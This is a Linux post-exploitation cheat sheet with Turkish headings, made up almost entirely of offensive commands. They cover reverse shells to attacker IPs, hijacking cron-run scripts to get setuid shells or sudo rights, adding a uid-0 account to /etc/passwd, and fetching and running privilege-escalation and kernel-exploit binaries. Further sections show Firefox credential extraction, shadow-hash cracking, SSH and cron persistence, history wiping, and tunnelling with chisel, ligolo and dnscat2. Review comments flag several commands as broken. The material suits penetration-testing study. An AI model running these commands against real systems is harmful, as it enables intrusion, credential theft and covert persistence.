Linux Post Exploitation
Kullanıcı ve Gruplar
# Identity and environment of the current shell.
id # current user, primary group and supplementary groups
cat /etc/passwd # local user accounts
env # environment variables
# NOTE(review): relative path — this reads .bashrc from the current working directory, not necessarily from $HOME
cat .bashrc
Sistem Bilgileri
# Host, kernel, packages, storage and loaded kernel modules.
hostname # hostname
uname -a # kernel version and architecture
cat /etc/os-release
cat /etc/issue
dpkg -l # installed packages (Debian/Ubuntu family only)
# Mounted filesystems: configured mounts and what is actually mounted now
cat /etc/fstab
mount
# All block devices
lsblk
# Kernel modules and drivers
lsmod
/sbin/modinfo libata
# Recursive, case-insensitive content search from /; "aranacak_kelime" is a placeholder meaning "word_to_search". Slow on large filesystems.
grep -Ril "aranacak_kelime" / 2>/dev/null # keyword search
find / -name flag.txt 2>/dev/null # search for a file by exact name
Process Bilgileri
ps aux # all processes of all users, with owner and command line
Ağ Bilgileri
# Interfaces, listening sockets, routing, firewall and name resolution.
# Network interfaces
ip a
# NOTE(review): the flag is `-a`; `ifconfig a` asks for an interface literally named "a"
ifconfig a
# Open ports
netstat -punta
ss -ntpul
# Routing table
route
cat /etc/networks
ip route
# Firewall rules (iptables-persistent file layout)
cat /etc/iptables/rules.v4
# Credentials passing over the loopback interface
# Runs until interrupted; tcpdump buffers its output when writing to a pipe, so matches can appear with a delay
sudo tcpdump -i lo -A | grep "pass"
cat /etc/hosts # hosts file
cat /etc/resolv.conf # DNS resolver configuration
CronJobs
# Scheduled-task enumeration, then three payloads written into a script that cron runs.
ls -lah /etc/cron* # cron directories and files
cat /var/spool/cron/crontabs/root # root's crontab
crontab -l # current user's crontab
sudo crontab -l # root's crontab, via sudo
grep "CRON" /var/log/syslog # cron activity in the system log
# All cron jobs in one view; only lines that start with # are dropped
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
# Reverse shell through a cron-run script
# Presumably /home/john/backup.sh is run by cron as root and is writable by the current user; ls shows owner and mode
ls -la /home/john/backup.sh
# Replaces the script body with a named-pipe reverse shell to 192.168.1.3:1234 (`>` discards the original contents)
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh
# Root shell through a setuid copy of bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/john/backup.sh
# Run after cron has executed the script; -p keeps the effective uid instead of dropping it
/tmp/bash -ip
# Sudo rights through a direct append to /etc/sudoers
# No visudo syntax check here: a malformed line in /etc/sudoers breaks sudo for every user on the host
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh
World Writable Dosyalar
# World-writable regular files, excluding /proc, /sys and the caller's own home
find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null
# If /etc/passwd shows up in that list, a root user can be added to it
# Prints a crypt(3) hash of the literal password "password"; it goes in place of the x's on the next line
openssl passwd password
# Appends a second uid-0 account named root2 (uid 0, gid 0, home /root, bash shell)
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
SUID Binary
# Setuid binaries: list what is present, then compare against the usual set.
find / -perm -4000 2>/dev/null
# The files below are normally setuid on a stock install
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount
# Or: a setuid file that uses a file we are able to modify
ls -la backup.sh # the setuid file
ls -la backup.config # the file the setuid file calls
# NOTE(review): `cp` needs two operands; as written it errors out and the `>` only truncates backup.config to an empty file
cp /bin/bash > backup.config
./backup.sh
SUDO
Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.
# Lists the commands the current user may run through sudo and the rule each one matches
sudo -l
# If a shell script is allowed as ROOT with NOPASSWD, running it through sudo gives a root context
# `-c /bin/bash` is just passed to the script; what it does with that argument depends on the script itself
sudo /usr/bin/backup.sh -c /bin/bash
Binary Capabilities
GTFOBins: https://gtfobins.github.io/
# File capabilities set on any binary under /; entries can be checked against GTFOBins (link above)
/usr/sbin/getcap -r / 2>/dev/null
Wildcard Exploit
Eğer bir cronjob'da * karakteri varsa aşağıdaki exploit uygulanabilir.
# Wildcard injection: creates files whose names GNU tar reads as --checkpoint options when a job runs `tar ... *` in this directory
echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
# NOTE(review): the leading `grep "` is a paste error — that double quote is never closed, so this line and the rest of the block become one unterminated string
grep "echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip
Automated
# Enumeration scripts: staged on the attacker host, then fetched and run on the target.
# Local (attacker host)
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80 # serves the current directory; binding port 80 normally needs root
# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check
chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check
./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt # "standard" check set; results written to output.txt
Reverse Shell
# Listener on the attacker side, followed by three payload forms for the target.
# Simple listener
nc -lvnp 9001
# Listener with automatic shell handling (pwncat-cs)
pwncat-cs -p 9001
# Named-pipe reverse shell: bash's stdin and stdout are tied to the nc connection through /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.2 9001 >/tmp/f
# Bash-only variant over the /dev/tcp pseudo-device
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.2/9001 0>&1'
# Base64-wrapped payload; <BASE64_REV> is a placeholder and ${IFS} expands to whitespace in place of a literal space
echo "<BASE64_REV>"|base64${IFS}-d|bash
Shell Upgrade
# Upgrading a plain reverse shell to an interactive pty.
# If python is available
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
# If python is not available
script /dev/null -qc /bin/bash
# Afterwards, on the attacker terminal: background the shell, put the local tty in raw mode, bring the shell back
CTRL + Z
stty size # prints "rows columns"; those two numbers are entered below
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset; # replace 181 and 42 with the values printed by `stty size`
Firefox Creds
Decrypter: https://github.com/unode/firefox_decrypt
# Firefox profile artifacts under root's home; "x.default-esr" stands for the actual profile directory name
cat /root/.mozilla/firefox/x.default-esr/logins.json # saved logins; the secrets are encrypted with the key stored in key4.db
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite # cookies (SQLite database, not plain text)
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite # form autofill history (SQLite)
cat /root/.mozilla/firefox/x.default-esr/key4.db # NSS key database needed to decrypt logins.json (see the decrypter link above)
cat /root/.mozilla/firefox/x.default-esr/logins.json # NOTE(review): duplicate of the first line
Dosya Transferi
# Moving files between the attacker host and the target.
# Local (attacker host)
python3 -m http.server 80
updog 80
# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
# With netcat: start the receiver first, then the sender; -w 3 closes the sender after 3 s without traffic
nc -lvnp 1234 > file.txt
nc -w 3 192.168.1.3 1234 < file.txt
Kernel Exploit
# Kernel exploit workflow: identify the release, search, fetch and build on the target.
cat /etc/issue
uname -r # kernel release
# Keeps searchsploit results mentioning "4." and drops those marked "< 4.4.0" or "4.8"
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80 # attacker side
wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995 # requires a compiler on the target
./cve-2017-16995
SSH Persistence
# SSH persistence: reuse the target root's key, or install our own public key.
# If there is no id_rsa (generates a key pair under ~/.ssh)
ssh-keygen
# Pulls root's private key from the target to the attacker host
scp root@192.168.1.3:~/.ssh/id_rsa .
chmod 600 id_rsa # ssh refuses private keys with wider permissions
ssh root@192.168.1.3 -i id_rsa
ssh-keygen # generate an ssh key pair on Kali
cat /root/.ssh/id_rsa.pub
# Writes the public key (the x's) into root's authorized_keys on the target; `>` replaces any keys already present
echo 'xxxxxxxxxxxxxx'>/root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
User Persistence
# Persistence through a new local account placed in the sudo group
useradd -m -s /bin/bash hacker # create the user with a home directory and bash as login shell
usermod -aG sudo hacker # append (-a) to the sudo group
passwd hacker # interactive password prompt
ssh hacker@192.168.1.3
Cron Persistence
# Persistence through a per-minute cron entry that opens a reverse shell to <IP>:1234 (<IP> is a placeholder)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<IP>/1234 0>&1'" > cron # writes the entry to a file named "cron"
# NOTE(review): `-i` is crontab's prompt-before-delete modifier for -r; confirm the target's crontab accepts it when installing from a file
crontab -i cron
crontab -l # verify the installed table
Hash Dumping
Eğer hedef makinede root kullanıcı isek aşağıdaki komut ile bütün kullanıcıların hash değerlerini görebiliriz.
# Reads the password hashes (root only), then cracks them offline on the attacker host
cat /etc/shadow
john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt # $6$ (sha512crypt) hashes copied into hashes.txt
# NOTE(review): -a3 is hashcat's mask-attack mode, so the path given here is read as a mask rather than a wordlist — check the intended attack mode; -m 1800 is sha512crypt
hashcat -a3 -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
ssh2john id_rsa > ssh.hash # converts a passphrase-protected private key into john's hash format
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf' # appends a custom rule set to john's config
History Silme
# Clears the in-memory history of the current shell, then truncates the history file on disk
history -c
cat /dev/null > ~/.bash_history
Port Forwarding
# Relays a host on the same network whose port 22 is open to a local port: listen on 2222, fork per connection, forward to 192.168.1.4:22
socat -ddd TCP-LISTEN:2222,fork TCP:192.168.1.4:22
ssh 192.168.1.3 -p 2222 # connects to the relay (presumably 192.168.1.3 runs socat) and ends up on 192.168.1.4's sshd
SSH Tunneling
# SSH-based forwarding: local, dynamic, remote, remote-dynamic, and sshuttle.
# Local port forwarding: binds 2222 on all interfaces of the machine running ssh and forwards it to 172.16.1.4:22 via 192.168.1.3
ssh -N -L 0.0.0.0:2222:172.16.1.4:22 root@192.168.1.3
# NOTE(review): the forwarded port lives on the ssh client, not on 192.168.1.3; this reaches it only when run from another host against the client's address — confirm which host is meant
ssh root@192.168.1.3 -p 2222
# Dynamic port forwarding: SOCKS listener on 9999, all interfaces, on the ssh client
ssh -N -D 0.0.0.0:9999 root@192.168.1.3
mousepad /etc/proxychains4.conf # proxychains entry to add follows
# NOTE(review): same point — the SOCKS port is on the ssh client; 192.168.1.3 is the ssh server here
socks5 192.168.1.3 9999
proxychains nmap -v -sT -Pn 172.168.1.3 # -sT because SOCKS only carries full TCP connects; 172.168.x.x is not a private range — possibly a typo for 172.16.1.3
# Remote port forward: sshd must be running on the attacker host (192.168.1.2); the target makes 127.0.0.1:2222 there forward to 10.4.50.215:22
systemctl start ssh
ssh -N -R 127.0.0.1:2222:10.4.50.215:22 root@192.168.1.2
ssh 127.0.0.1 -p 2222 # run on 192.168.1.2
# Remote dynamic port forward: SOCKS listener on 9999 of 192.168.1.2 (reverse dynamic forwarding needs a recent OpenSSH on both ends)
ssh -N -R 9999 root@192.168.1.2
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999
proxychains nmap -v -sT -Pn -n 172.168.1.3
# sshuttle: routes the listed subnets over the ssh session, VPN-like
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24
HTTP Tunneling
# chisel and Ligolo tunnels: server/proxy on the attacker host, client/agent on the target.
# https://github.com/jpillora/chisel/releases
python -m http.server 80 # serve the chisel binary
chisel server --port 8081 --reverse # attacker side; --reverse lets the client open listeners on the server
wget http://192.168.1.2/chisel -O /tmp/chisel && chmod +x /tmp/chisel # on the target
# Reverse SOCKS proxy opened on the server; client output goes to /tmp/output
# NOTE(review): the binary is fetched from 192.168.1.2 but the server is contacted at 192.168.1.3 — confirm both refer to the chisel host
/tmp/chisel client 192.168.1.3:8081 R:socks &> /tmp/output
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 1080 # proxychains entry to add; 1080 is chisel's default port for R:socks
# Ligolo: proxy on the attacker host, agent on the target
./proxy -selfcert -laddr 0.0.0.0:443
./agent -ignore-cert -connect 192.168.1.2:443
DNS Tunneling
# DNS tunnel: dnsmasq as the authoritative server for feline.corp, dnscat2 carried over it.
mousepad dnsmasq.conf # the lines up to the dnsmasq command are the contents of this file
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts
# Define the zone
auth-zone=feline.corp
auth-server=feline.corp
# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.
dnsmasq -C dnsmasq.conf -d # run with that config file, in the foreground (-d)
# Local (attacker host): dnscat2 server for the zone, then serve the client binary
dnscat2-server feline.corp
cp /usr/bin/dnscat .
python -m http.server 80
# Target
wget http://192.168.1.2/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat
/tmp/dnscat feline.corp # client; its traffic travels inside DNS queries for feline.corp
# Typed in the dnscat2 server console: select session 1, then open a listener on 4455 that forwards to 172.16.2.4:445
window -i 1
listen 0.0.0.0:4455 172.16.2.4:445